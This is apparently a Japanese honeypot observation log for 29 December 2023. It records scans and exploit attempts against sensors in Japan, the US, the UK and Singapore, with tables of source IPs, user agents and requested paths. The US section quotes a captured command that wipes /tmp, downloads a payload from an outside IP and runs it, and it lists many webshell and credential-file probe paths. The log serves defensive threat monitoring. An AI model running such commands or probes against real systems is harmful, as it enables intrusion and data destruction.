2023/12/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/12/29分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

IDBTE4M CODE87によるスキャン行為
/.gitへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  93.123.85.43/jaws;
sh /tmp/jaws

Location:UK

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
configファイルへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
configファイルへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：69 (前日比：-120)
US：総アクセス数：348 (前日比：249)
UK：総アクセス数：81 (前日比：-100)
SG：総アクセス数：93 (前日比：-39)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.233.146.227	United States
1	5.196.102.66	France
1	5.196.102.67	France
4	18.162.61.219	United States
1	18.215.251.60	United States
1	20.80.189.155	United States
1	45.33.80.243	United States
1	45.56.108.128	United States
1	47.88.6.178	United States
1	47.254.16.187	United States
2	54.172.172.156	United States
1	64.62.197.54	United States
1	64.62.197.60	United States
1	64.227.40.179	United States
1	66.240.205.34	United States
2	78.153.140.219	Russia
15	101.32.192.203	Singapore
1	104.192.0.61	United States
1	134.209.173.104	United States
4	135.125.244.48	France
8	135.125.246.110	France
3	135.125.246.189	France
1	141.98.7.187	Bulgaria
1	172.104.11.34	United States
6	185.254.196.173	Ukraine
4	185.254.196.186	Ukraine
1	194.233.83.117	Singapore
2	198.235.24.151	United States
1	207.254.31.129	United States

UserAgent一覧

件数	UserAgent
7	`-`
2	`Go-http-client/1.1`
1	`IDBTE4M CODE87`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1`
4	`axios/0.27.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`\x16\x03\x01\x01H\x01`
4		`\x16\x03\x01`
1		``
29	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`//.env`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/v3/time`	HTTP/1.1
15	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
4	POST	`/graphql`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
18	18.171.204.29	United States
1	20.150.201.61	United States
240	20.238.102.107	United States
1	24.144.92.117	United States
1	45.79.128.205	United States
1	45.79.181.251	United States
18	45.129.14.57	Romania
1	45.141.151.228	Turkey
1	47.88.93.234	United States
1	47.88.101.3	United States
5	54.36.115.221	France
5	54.37.79.75	France
1	54.92.160.158	United States
2	62.233.50.179	Russia
1	65.49.1.42	United States
1	71.6.134.235	United States
2	78.153.140.219	Russia
2	78.153.140.221	Russia
2	83.97.73.87	Germany
4	90.151.171.106	Russia
6	90.151.171.108	Russia
7	95.214.235.169	Ukraine
1	103.187.190.5	private ip address
3	115.209.81.132	China
1	134.209.16.220	United States
1	134.209.173.104	United States
2	141.98.7.187	Bulgaria
2	162.142.125.12	United States
1	165.232.110.74	United States
1	167.94.145.57	United States
1	172.104.11.4	United States
2	172.104.11.46	United States
3	172.104.11.51	United States
1	172.105.128.11	United States
3	184.105.247.252	United States
1	188.215.235.122	Romania
1	192.155.90.220	United States
1	198.211.115.238	United States
2	205.210.31.77	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
33	`-`
241	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)`
1	`Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0`
1	`Mozilla/5.0 (Android 6.0.1; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 11; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 11; SM-A115F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 8.1.0; TECNO KA7O Build/O11019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/5.0.4.3000 Chrome/47.0.2526.73 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
5	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
1	`Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15`
1	`Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP`
1	`Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`NetSurf/1.2 (NetBSD; amd64)`
1	`Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00`
1	`SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0`
1	`WebCopier v4.6`
1	`python-requests/2.25.1`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x03`
2		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\xfb\x01`
25		`\x16\x03\x01`
1		``
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
2	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`//0x55[.]php`	HTTP/1.1
1	GET	`//0x[.]php`	HTTP/1.1
1	GET	`//0z[.]php`	HTTP/1.1
1	GET	`//1337[.]php`	HTTP/1.1
1	GET	`//1877[.]php`	HTTP/1.1
1	GET	`//1975[.]php`	HTTP/1.1
1	GET	`//1[.]php`	HTTP/1.1
1	GET	`//403[.]php`	HTTP/1.1
1	GET	`//404[.]php`	HTTP/1.1
1	GET	`//406[.]php`	HTTP/1.1
1	GET	`//503[.]php`	HTTP/1.1
1	GET	`//DKIZ[.]php?DKIZ`	HTTP/1.1
1	GET	`//Deadcode1975[.]php`	HTTP/1.1
1	GET	`//F0x[.]php`	HTTP/1.1
1	GET	`//Gecko[.]php`	HTTP/1.1
1	GET	`//IndoXploit[.]php`	HTTP/1.1
1	GET	`//Marvins[.]php`	HTTP/1.1
1	GET	`//R00T[.]php`	HTTP/1.1
1	GET	`//__1975[.]php`	HTTP/1.1
1	GET	`//about[.]php`	HTTP/1.1
1	GET	`//access[.]php`	HTTP/1.1
1	GET	`//admin[.]php`	HTTP/1.1
1	GET	`//alf[.]php`	HTTP/1.1
1	GET	`//alfa[.]php`	HTTP/1.1
1	GET	`//alfaindex[.]php`	HTTP/1.1
1	GET	`//alfanew[.]php7`	HTTP/1.1
1	GET	`//an[.]php`	HTTP/1.1
1	GET	`//anon[.]php`	HTTP/1.1
1	GET	`//bala[.]php`	HTTP/1.1
1	GET	`//by[.]php`	HTTP/1.1
1	GET	`//byp[.]php`	HTTP/1.1
1	GET	`//ch[.]php`	HTTP/1.1
1	GET	`//classwithtostring[.]php`	HTTP/1.1
1	GET	`//columns[.]php`	HTTP/1.1
1	GET	`//contents[.]php`	HTTP/1.1
1	GET	`//cp[.]php`	HTTP/1.1
1	GET	`//credits[.]php`	HTTP/1.1
1	GET	`//css[.]php`	HTTP/1.1
1	GET	`//customize[.]php`	HTTP/1.1
1	GET	`//d7[.]php`	HTTP/1.1
1	GET	`//default[.]php`	HTTP/1.1
1	GET	`//demo[.]php`	HTTP/1.1
1	GET	`//doc[.]php`	HTTP/1.1
1	GET	`//edit-comments.php`	HTTP/1.1
1	GET	`//ee[.]php`	HTTP/1.1
1	GET	`//emergency[.]php`	HTTP/1.1
1	GET	`//end[.]php`	HTTP/1.1
1	GET	`//evil[.]php`	HTTP/1.1
1	GET	`//exit[.]php`	HTTP/1.1
1	GET	`//fan[.]php`	HTTP/1.1
1	GET	`//fm[.]php`	HTTP/1.1
1	GET	`//font-editor.php`	HTTP/1.1
1	GET	`//fox[.]php`	HTTP/1.1
1	GET	`//fw[.]php`	HTTP/1.1
1	GET	`//fx[.]php`	HTTP/1.1
1	GET	`//gaza[.]php`	HTTP/1.1
1	GET	`//gecko[.]php`	HTTP/1.1
1	GET	`//google[.]php`	HTTP/1.1
1	GET	`//h4xor[.]php`	HTTP/1.1
1	GET	`//hanna1337[.]php`	HTTP/1.1
1	GET	`//hehe[.]php`	HTTP/1.1
1	GET	`//home[.]php?xsec=team`	HTTP/1.1
1	GET	`//images/F0x.php`	HTTP/1.1
1	GET	`//images/vuln.php`	HTTP/1.1
1	GET	`//inbox[.]php`	HTTP/1.1
1	GET	`//index2[.]php`	HTTP/1.1
1	GET	`//index[.]php?3x=3x`	HTTP/1.1
1	GET	`//indexs[.]php`	HTTP/1.1
1	GET	`//ini[.]php`	HTTP/1.1
1	GET	`//init[.]php`	HTTP/1.1
1	GET	`//kill[.]php`	HTTP/1.1
1	GET	`//lalala[.]php`	HTTP/1.1
1	GET	`//leet[.]php`	HTTP/1.1
1	GET	`//license[.]php`	HTTP/1.1
1	GET	`//lock0360[.]php`	HTTP/1.1
1	GET	`//lock360[.]php`	HTTP/1.1
1	GET	`//lock[.]php`	HTTP/1.1
1	GET	`//log[.]php`	HTTP/1.1
1	GET	`//lufi[.]php`	HTTP/1.1
1	GET	`//lufix[.]php`	HTTP/1.1
1	GET	`//lyda[.]php`	HTTP/1.1
1	GET	`//m[.]php`	HTTP/1.1
1	GET	`//mad[.]php`	HTTP/1.1
1	GET	`//mar[.]php`	HTTP/1.1
1	GET	`//marijuana[.]php`	HTTP/1.1
1	GET	`//mass[.]php`	HTTP/1.1
1	GET	`//me[.]php`	HTTP/1.1
1	GET	`//media-admin.php`	HTTP/1.1
1	GET	`//mini[.]php`	HTTP/1.1
1	GET	`//minishell[.]php`	HTTP/1.1
1	GET	`//moon[.]php`	HTTP/1.1
1	GET	`//moto[.]php`	HTTP/1.1
1	GET	`//olux[.]php`	HTTP/1.1
1	GET	`//payload[.]php`	HTTP/1.1
1	GET	`//plugin-install.php`	HTTP/1.1
1	GET	`//plugins[.]php`	HTTP/1.1
1	GET	`//priv8[.]php`	HTTP/1.1
1	GET	`//private[.]php`	HTTP/1.1
1	GET	`//repeater[.]php`	HTTP/1.1
1	GET	`//root[.]php`	HTTP/1.1
1	GET	`//rxr[.]php?rxr`	HTTP/1.1
1	GET	`//rxr[.]php`	HTTP/1.1
1	GET	`//sh[.]php`	HTTP/1.1
1	GET	`//shell20211028[.]php`	HTTP/1.1
1	GET	`//shell[.]php`	HTTP/1.1
1	GET	`//shells[.]php`	HTTP/1.1
1	GET	`//shellx[.]php`	HTTP/1.1
1	GET	`//sites/all/libraries/elfinder/connectors/php/connector.php`	HTTP/1.1
1	GET	`//small[.]php`	HTTP/1.1
1	GET	`//snd[.]php`	HTTP/1.1
1	GET	`//srx[.]php`	HTTP/1.1
1	GET	`//style[.]php`	HTTP/1.1
1	GET	`//sym[.]php`	HTTP/1.1
1	GET	`//symlink[.]php`	HTTP/1.1
1	GET	`//templates/beez3/error.php`	HTTP/1.1
1	GET	`//term[.]php`	HTTP/1.1
1	GET	`//tesla[.]php`	HTTP/1.1
1	GET	`//text[.]php`	HTTP/1.1
1	GET	`//theme-install.php`	HTTP/1.1
1	GET	`//themes[.]php`	HTTP/1.1
1	GET	`//tmp/vuln.php`	HTTP/1.1
1	GET	`//tmpshell[.]php`	HTTP/1.1
1	GET	`//tnt[.]php`	HTTP/1.1
1	GET	`//ton[.]php`	HTTP/1.1
1	GET	`//tools[.]php`	HTTP/1.1
1	GET	`//tron[.]php`	HTTP/1.1
1	GET	`//up[.]php`	HTTP/1.1
1	GET	`//update-core.php`	HTTP/1.1
1	GET	`//update[.]php`	HTTP/1.1
1	GET	`//uph[.]php`	HTTP/1.1
2	GET	`//upl[.]php`	HTTP/1.1
1	GET	`//upload[.]php`	HTTP/1.1
1	GET	`//uploads/up.php`	HTTP/1.1
1	GET	`//ups[.]php`	HTTP/1.1
1	GET	`//user-new.php`	HTTP/1.1
1	GET	`//user[.]php`	HTTP/1.1
1	GET	`//users[.]php`	HTTP/1.1
1	GET	`//utchiha505[.]php`	HTTP/1.1
1	GET	`//utchiha[.]php`	HTTP/1.1
1	GET	`//utchiha_uploader[.]php`	HTTP/1.1
1	GET	`//v3n0m[.]php`	HTTP/1.1
1	GET	`//wp-22.php`	HTTP/1.1
1	GET	`//wp-admin/1975.php`	HTTP/1.1
1	GET	`//wp-admin/alfa.php`	HTTP/1.1
1	GET	`//wp-admin/css/colors/blue/CasperExV1.php`	HTTP/1.1
1	GET	`//wp-admin/css/colors/blue/uploader.php`	HTTP/1.1
1	GET	`//wp-admin/css/colors/coffee/index.php`	HTTP/1.1
1	GET	`//wp-admin/dropdown.php`	HTTP/1.1
1	GET	`//wp-admin/fw.php`	HTTP/1.1
1	GET	`//wp-admin/fx.php`	HTTP/1.1
1	GET	`//wp-admin/home.php?xsec=team`	HTTP/1.1
1	GET	`//wp-admin/includes/users.php`	HTTP/1.1
1	GET	`//wp-admin/network/db.php`	HTTP/1.1
1	GET	`//wp-admin/network/subjects.php`	HTTP/1.1
1	GET	`//wp-admin/shell20211028.php`	HTTP/1.1
1	GET	`//wp-admin/users.php`	HTTP/1.1
1	GET	`//wp-admin/wp-22.php`	HTTP/1.1
1	GET	`//wp-admin/wp-trc.php`	HTTP/1.1
1	GET	`//wp-admin/wp_filemanager.php`	HTTP/1.1
1	GET	`//wp-admin/wso.php`	HTTP/1.1
1	GET	`//wp-admin/wso112233.php`	HTTP/1.1
1	GET	`//wp-blog.php`	HTTP/1.1
1	GET	`//wp-content/alfa.php`	HTTP/1.1
1	GET	`//wp-content/cong.php`	HTTP/1.1
1	GET	`//wp-content/fw.php`	HTTP/1.1
1	GET	`//wp-content/home.php?xsec=team`	HTTP/1.1
1	GET	`//wp-content/plugins/Cache/Cache.php`	HTTP/1.1
1	GET	`//wp-content/plugins/Cache/dropdown.php`	HTTP/1.1
2	GET	`//wp-content/plugins/TOPXOH/wDR.php`	HTTP/1.1
1	GET	`//wp-content/plugins/anttt/simple.php`	HTTP/1.1
1	GET	`//wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php`	HTTP/1.1
1	GET	`//wp-content/plugins/ccx/index.php`	HTTP/1.1
1	GET	`//wp-content/plugins/core-stab/casper.php`	HTTP/1.1
1	GET	`//wp-content/plugins/elementor/includes/settings/index.php`	HTTP/1.1
2	GET	`//wp-content/plugins/hellopress/wp_filemanager.php`	HTTP/1.1
1	GET	`//wp-content/plugins/index.php`	HTTP/1.1
1	GET	`//wp-content/plugins/instabuilder2/cache/plugins/moon.php`	HTTP/1.1
1	GET	`//wp-content/plugins/ioptimization/IOptimize.php?rchk`	HTTP/1.1
1	GET	`//wp-content/plugins/linkpreview/db.php?u`	HTTP/1.1
1	GET	`//wp-content/plugins/real/v.php`	HTTP/1.1
1	GET	`//wp-content/plugins/revslider/includes/external/page/index.php`	HTTP/1.1
1	GET	`//wp-content/plugins/revslider/includes/page/index.php`	HTTP/1.1
1	GET	`//wp-content/plugins/w0rdpr3ssnew/about.php`	HTTP/1.1
2	GET	`//wp-content/plugins/wordpresss3cll/up.php`	HTTP/1.1
1	GET	`//wp-content/plugins/wp-file-upload/ROOBOTS.php`	HTTP/1.1
1	GET	`//wp-content/plugins/xsid/marijuana.php`	HTTP/1.1
1	GET	`//wp-content/shell20211028.php`	HTTP/1.1
1	GET	`//wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php`	HTTP/1.1
1	GET	`//wp-content/themes/classic/inc/casper.php`	HTTP/1.1
1	GET	`//wp-content/themes/finley/min.php`	HTTP/1.1
1	GET	`//wp-content/themes/gaukingo/db.php?u`	HTTP/1.1
1	GET	`//wp-content/themes/pridmag/db.php?u`	HTTP/1.1
1	GET	`//wp-content/themes/welfare-charity/www.php`	HTTP/1.1
1	GET	`//wp-content/up.php`	HTTP/1.1
1	GET	`//wp-content/uploads/typehub/custom/.RxR.php?cmd=up`	HTTP/1.1
1	GET	`//wp-content/wp-conf.php`	HTTP/1.1
1	GET	`//wp-content/wp_filemanager.php`	HTTP/1.1
1	GET	`//wp-file.php`	HTTP/1.1
1	GET	`//wp-includes/atom.php`	HTTP/1.1
1	GET	`//wp-includes/blocks/table/int/tmpl/index.php`	HTTP/1.1
1	GET	`//wp-includes/class-json-ajax-session.php`	HTTP/1.1
1	GET	`//wp-includes/fw.php`	HTTP/1.1
1	GET	`//wp-includes/home.php?xsec=team`	HTTP/1.1
1	GET	`//wp-includes/random_compat/random_bytes_cyclone.php`	HTTP/1.1
1	GET	`//wp-includes/shell20211028.php`	HTTP/1.1
1	GET	`//wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php`	HTTP/1.1
2	GET	`//wp-includes/wp-class.php`	HTTP/1.1
1	GET	`//wp-includes/wp_filemanager.php`	HTTP/1.1
1	GET	`//wp-info.php`	HTTP/1.1
1	GET	`//wp-plugins.php`	HTTP/1.1
1	GET	`//wp[.]php`	HTTP/1.1
1	GET	`//wp_filemanager[.]php`	HTTP/1.1
1	GET	`//wp_wrong_datlib[.]php`	HTTP/1.1
1	GET	`//wpx[.]php`	HTTP/1.1
1	GET	`//ws[.]php`	HTTP/1.1
1	GET	`//wso112233[.]php`	HTTP/1.1
1	GET	`//wso[.]php`	HTTP/1.1
1	GET	`//wsoyanzorng[.]php`	HTTP/1.1
1	GET	`//wsu[.]php`	HTTP/1.1
1	GET	`//www[.]php`	HTTP/1.1
1	GET	`//x[.]php`	HTTP/1.1
1	GET	`//xl2023[.]php`	HTTP/1.1
1	GET	`//xleet[.]php`	HTTP/1.1
1	GET	`//xlettt[.]php`	HTTP/1.1
1	GET	`//xml[.]php`	HTTP/1.1
1	GET	`//xmlrpc2[.]php`	HTTP/1.1
1	GET	`//xox[.]php`	HTTP/1.1
1	GET	`//xx[.]php`	HTTP/1.1
1	GET	`//xxl[.]php`	HTTP/1.1
1	GET	`//xzourt[.]php`	HTTP/1.1
1	GET	`//z[.]php`	HTTP/1.1
1	GET	`//zz[.]php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/aws-secret.yaml`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/b1a3k.php`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/default.json`	HTTP/1.1
1	GET	`/debug/default/view.html`	HTTP/1.1
1	GET	`/debug/default/view`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend/web/debug/default/view`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
2	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.43/jaws;sh+/tmp/jaws`
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/web/debug/default/view`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-config.old`	HTTP/1.1
1	GET	`/wp-config.php.backup`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php_new`	HTTP/1.1
1	GET	`/wp-config.txt`	HTTP/1.1
1	GET	`/wp-content/index.php`	HTTP/1.1
1	GET	`/wp-content/plugins/dzs-zoomsounds/1877.php`	HTTP/1.1
1	GET	`/wp.php`	HTTP/1.1
1	GET	`/wpp-config.php~`	HTTP/1.1
1	GET	`http[:]//api[.]ipify[.]org?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z73802194750Q1`	HTTP/1.1
1	POST	`/api/v0/id`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
5	20.150.201.61	United States
2	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
2	54.36.115.221	France
11	54.37.79.75	France
2	62.233.50.179	Russia
1	66.240.205.34	United States
2	78.153.140.219	Russia
2	78.153.140.221	Russia
3	78.153.140.224	Russia
2	83.97.73.87	Germany
1	84.17.49.75	United Kingdom
8	95.214.235.169	Ukraine
1	134.122.96.160	United States
1	139.59.101.104	Singapore
1	141.98.7.187	Bulgaria
6	148.153.45.234	United States
2	159.223.77.217	United States
6	165.154.182.92	Hong Kong
2	167.94.145.58	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
3	184.105.247.252	United States
1	191.101.157.148	United States
1	192.155.90.118	United States
3	192.155.90.220	United States
1	192.241.237.34	United States
1	194.29.187.20	United States
2	198.235.24.145	United States
2	198.235.24.171	United States
1	206.189.122.243	United States
1	216.218.206.69	United States

UserAgent一覧

件数	UserAgent
27	`-`
1	`Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9506 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0_2) AppleWebKit/557.46 (KHTML, like Gecko) Chrome/88.0.29 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2) AppleWebKit/553.47 (KHTML, like Gecko) Chrome/106.0.134 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Windows NT 9_1; Win64; x64) AppleWebKit/601.51 (KHTML, like Gecko) Chrome/102.0.2839 Safari/537.36`
